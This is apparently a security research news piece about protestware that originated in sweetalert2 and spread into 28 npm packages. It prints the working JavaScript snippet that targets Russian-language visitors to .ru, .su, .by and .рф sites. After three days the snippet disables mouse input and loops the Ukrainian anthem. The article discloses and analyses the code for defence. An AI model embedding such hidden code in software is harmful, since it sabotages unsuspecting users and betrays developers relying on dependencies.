Socket’s Threat Research Team has uncovered a significant supply chain security incident involving protestware that has spread across at least 28 new npm packages with nearly 2,000 versions.
The malicious code targets Russian-language users visiting Russian or Belarusian websites, disabling UI interactions and playing the Ukrainian national anthem.
This represents a concerning example of how political activism in software can propagate undetected through dependency chains, affecting unsuspecting developers and end users.
Technical Analysis of the Protestware Mechanism
The protestware operates through a sophisticated conditional check embedded deep within packages containing over 100,000 lines of code.
The malicious script requires three specific conditions to activate: the user must be using a browser, have Russian language settings, and be visiting domains with .ru, .su, .by, or .рф extensions.
The core malicious code implements a time-delayed activation mechanism:
```javascript
// Activation gate: browser context, Russian UI language, and a .ru/.su/.by/.рф host
if (typeof window !== 'undefined' && /^ru\b/.test(navigator.language) && location.host.match(/\.(ru|su|by|xn--p1ai)$/)) {
  var now = new Date();
  var initiationDate = localStorage.getItem('swal-initiation');
  if (!initiationDate) {
    // First visit: record the timestamp and do nothing else
    localStorage.setItem('swal-initiation', "".concat(now));
  } else if ((now.getTime() - Date.parse(initiationDate)) / (1000 * 60 * 60 * 24) > 3) {
    // More than three days since the first visit: lock the UI and loop the anthem
    setTimeout(function () {
      document.body.style.pointerEvents = 'none';
      var ukrainianAnthem = document.createElement('audio');
      ukrainianAnthem.src = 'https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3';
      ukrainianAnthem.loop = true;
      document.body.appendChild(ukrainianAnthem);
    }, 500);
  }
}
```
The script waits three days after the first visit before activating, so only repeat visitors are affected. Once triggered, it disables all mouse interactions by setting pointerEvents to ‘none’ and plays the Ukrainian anthem in a continuous loop.
Supply Chain Propagation and Security Implications
The protestware originated from the popular sweetalert2 package, which has over 700,000 weekly downloads.
The package’s author, limonte, transparently disclosed the protestware functionality beginning with version 11.6.14, which was published three years ago, during Russia’s invasion of Ukraine.
However, the code has since propagated to numerous other packages without disclosure.
Affected packages include MeshCentral (16,895 downloads), Qumra-UI (2,074 downloads), and Alurkerja-UI (1,521 downloads), among others.
Many of these packages appear to have copied code from sweetalert2 without understanding or documenting the embedded protestware functionality.
Socket has classified these packages as malware due to their undocumented behavior and potential to disrupt the user experience severely.
The incident highlights critical supply chain vulnerabilities, where political activism code can spread undetected through dependency networks, affecting developers and users who may be unaware of its presence or intent.